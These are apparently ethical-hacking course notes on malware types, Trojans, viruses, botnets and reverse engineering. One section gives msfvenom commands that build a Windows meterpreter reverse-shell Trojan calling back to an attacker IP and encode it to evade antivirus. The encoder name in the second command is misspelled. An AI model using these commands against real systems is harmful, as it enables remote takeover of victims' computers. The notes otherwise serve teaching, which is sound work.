Malware Overview
Malware is a malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator for the purpose of theft or fraud.
- Malware (Malicious Software) is a “catch-all” term for a code or program which is hostile and harmful to computer applications, hardware and infrastructure.
- Malware can have different forms and functions.
- Viruses, Worms, Trojans, Rootkits, Spyware, Adware, Ransomware are all types of malware.
Trojan Concepts
- A Trojan, is a type of malicious code or software that looks legitimate but can take control of your computer.
- A Trojan is designed to damage, disrupt, steal, or in general inflict some other harmful action on your data or network. Once installed, a Trojan can perform the action it was designed for.
- Trojans get activated upon users’ certain predefined actions.
How Hackers Use Trojans ??
- Delete or replace operating system’s critical files.
- Record screenshots, audio, and video of victim’s PC.
- Use victim’s PC for spamming and blasting email messages.
- Download spyware, adware, and malicious files.
- Disable firewalls and antivirus.
- Create backdoors to gain remote access.
- Use victim’s PC as a botnet to perform DDoS attacks.
- Steal information such as passwords, security codes, credit card information using keyloggers.
How to Create Trojans in Kali Linux: msfvenom
Attacker Host IP = 192.168.1.103
Create Trojan with msfvenom
msfvenom -p [payload] LHOST=[Your IP address] LPORT=[Port number] -f [file type] > [path]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe > trojan1.exe
Encrypt your Trojan with Shikata_ga_nai encoder
msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -e [encoder] -i [number of times to encrypt] -f [file type] > [path]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -e x86/shikata_ga_mai -i 100 -f exe > encryptedtrojan.exe
Virus and Worm Concepts
- A computer virus is a type of malware that propagates by inserting a copy of itself into and becoming part of another program. It spreads from one computer to another, leaving infections as it travels.
- Almost all viruses are attached to an executable file, which means the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious host file or program.
- Worms are standalone software and do not require a host program or human help to propagate
Why do People create Virus ??
- Inflict damage to competitors
- Financial benefits
- Research projects
- Play prank
- Vandalism
- Cyber terrorism
- Distribute political messages
Stages of Virus Life
- Design: Developing virus code using programming languages or construction kits.
- Replication: Virus replicates for a period of time within the target system and then spreads itself.
- Launch: It gets activated with the user performing certain actions such as running an infected program.
- Detection: A virus is identified as threat infecting target systems.
- Incorporation: Antivirus software developers assimilate defenses against the virus.
- Elimination: Users install antivirus updates and eliminate the virus threats.
Zombie: What it is ??
“A bot is a type of malware which allows an attacker to gain complete control over the affected computer. Computers that are infected with a bot are generally referred to as ‘zombies’ “.
“Networks of Zombie Computers are referred as Botnets”
Malware Reverse Engineering
- Reverse engineering has long been the leading method for understanding how malicious programs operate and what they’re engineered to do. Reverse engineering as a process has evolved as malware has become more sophisticated and detection tools have improved, but it remains critical.
- Reverse engineering malware involves disassembling (and sometimes decompiling) a software program.
- Through this process, binary instructions are converted to code mnemonics (or higher level constructs) so that engineers can look at what the program does and what systems it impacts.
